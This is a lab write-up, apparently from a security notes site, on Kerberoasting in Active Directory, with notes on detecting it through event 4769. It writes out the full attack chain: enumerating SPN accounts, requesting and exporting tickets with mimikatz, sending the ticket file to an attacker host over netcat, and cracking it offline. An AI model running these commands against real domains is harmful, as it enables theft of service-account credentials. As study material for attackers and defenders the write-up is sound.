description |
---|
Credential Access |
This lab explores an attack that allows any domain user to request kerberos tickets from TGS that are encrypted with NTLM hash of the plaintext password of a domain user account that is used as a service account (i.e account used for running an IIS service) and crack them offline avoiding AD account lockouts.
Note the vulnerable domain member - a user account with servicePrincipalName
attribute set, which is very important piece for kerberoasting - only user accounts with that property set are most likely susceptible to kerberoasting:
Attacker setting up an nc listener to receive a hash for cracking:
{% code-tabs %} {% code-tabs-item title="attacker@local" %}
nc -lvp 443 > kerberoast.bin
{% endcode-tabs-item %} {% endcode-tabs %}
Attacker enumerating user accounts with serverPrincipalName
attribute set:
{% code-tabs %} {% code-tabs-item title="attacker@victim" %}
Get-NetUser | Where-Object {$_.servicePrincipalName} | fl
{% endcode-tabs-item %} {% endcode-tabs %}
Using only built-in powershell, we can extract the susceptible accounts with:
get-adobject | Where-Object {$_.serviceprincipalname -ne $null -and $_.distinguishedname -like "*CN=Users*" -and $_.cn -ne "krbtgt"}
It would have been better to use the following command provided by Sean Metcalf purely because of the -filter
usage (quicker than select-object
), but it did not work for me:
get-adobject -filter {serviceprincipalname -like “*sql*”} -prop serviceprincipalname
Additionally, user accounts with SPN set could be extracted with a native windows binary:
setspn -T offense -Q */*
Attacker requesting a kerberos ticket (TGS) for a user account with servicePrincipalName
set to HTTP/dc-mantvydas.offense.local
- it gets stored in the memory:
{% code-tabs %} {% code-tabs-item title="attacker@victim" %}
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/dc-mantvydas.offense.local"
{% endcode-tabs-item %} {% endcode-tabs %}
Using mimikatz, the attacker extracts kerberos ticket from the memory and exports it to a file for cracking:
{% code-tabs %} {% code-tabs-item title="attacker@victim" %}
mimikatz # kerberos::list /export
{% endcode-tabs-item %} {% endcode-tabs %}
Attacker sends the exported service ticket to attacking machine for offline cracking:
{% code-tabs %} {% code-tabs-item title="attacker@victim" %}
nc 10.0.0.5 443 < C:\tools\mimikatz\x64\2-40a10000-spotless@HTTP~dc-mantvydas.offense.local-OFFENSE.LOCAL.kirbi
{% endcode-tabs-item %} {% endcode-tabs %}
Attacker brute forces the password of the service ticket:
{% code-tabs %} {% code-tabs-item title="attacker@local" %}
python2 tgsrepcrack.py pwd kerberoast.bin
{% endcode-tabs-item %} {% endcode-tabs %}
Below is a security log 4769
showing service access being requested:
If you see Add-event -AssemblyName SystemIdentityModel
(from advanced Powershell logging) followed by a windows security event 4769
immediately after that, you may be looking at an old school Kerberoasting, especially if ticket encryption type has a value 0x17
(23 decimal, meaning it's RC4 encrypted):
Below is the screenshot showing a request being sent to the Ticket Granting Service
(TGS) for the service with a servicePrincipalName HTTP/dc-mantvydas.offense.local
:
Below is the response from the TGS for the user spotless
(we initiated this attack from offense\spotless) which contains the encrypted (RC4) kerberos ticket (server part) to access the HTTP/dc-mantvydas.offense.local
service. It is the same ticket we cracked earlier with tgsrepcrack.py:
Out of curiosity, let's decrypt the kerberos ticket since we have the password the ticket was encrypted with.
Creating a kerberos keytab file for use in wireshark:
{% code-tabs %} {% code-tabs-item title="attacker@local" %}
root@~# ktutil
ktutil: add_entry -password -p HTTP/[email protected] -k 1 -e arcfour-hmac-md5
Password for HTTP/[email protected]:
ktutil: wkt /root/tools/iis.keytab
{% endcode-tabs-item %} {% endcode-tabs %}
Adding the keytab to wireshark:
Note how the ticket's previously encrypted piece is now in plain text and we can see information pertinent to the requested ticket for a service HTTP/dc-mantvydas.offense.local
:
Looking inside the code and adding a couple of print statements in key areas of the script, we can see that the password from the dictionary (Passw0rd
) initially gets converted into an NTLM (K0
) hash, then another key K1
is derived from the initial hash and a message type, yet another key K2
is derived from K1 and an MD5 digest of the encrypted data. Key K2
is the actual key used to decrypt the encrypted ticket data:
I did not have to, but I also used an online RC4 decryptor tool to confirm the above findings:
{% file src="../../.gitbook/assets/kerberoast.pcap" caption="kerberoast.pcap" %}
Tim Medin - Attacking Kerberos: Kicking the Guard Dog of Hades
{% embed url="https://attack.mitre.org/wiki/Technique/T1208" %}
{% embed url="https://github.com/nidem/kerberoast" %}
{% embed url="https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/" %}
{% embed url="https://adsecurity.org/?p=2293" %}
{% embed url="https://www.youtube.com/watch?v=nJSMJyRNvlM&feature=youtu.be&t=16" %}
{% embed url="http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" %}
{% embed url="https://pentestlab.blog/2018/06/12/kerberoast/" %}
{% embed url="https://blog.xpnsec.com/kerberos-attacks-part-1/" %}
{% embed url="https://pentestlab.blog/2018/06/12/kerberoast/" %}
{% embed url="http://rc4.online-domain-tools.com/" %}
{% embed url="https://crackstation.net/" %}
{% embed url="https://blogs.technet.microsoft.com/askds/2008/03/06/kerberos-for-the-busy-admin/" %}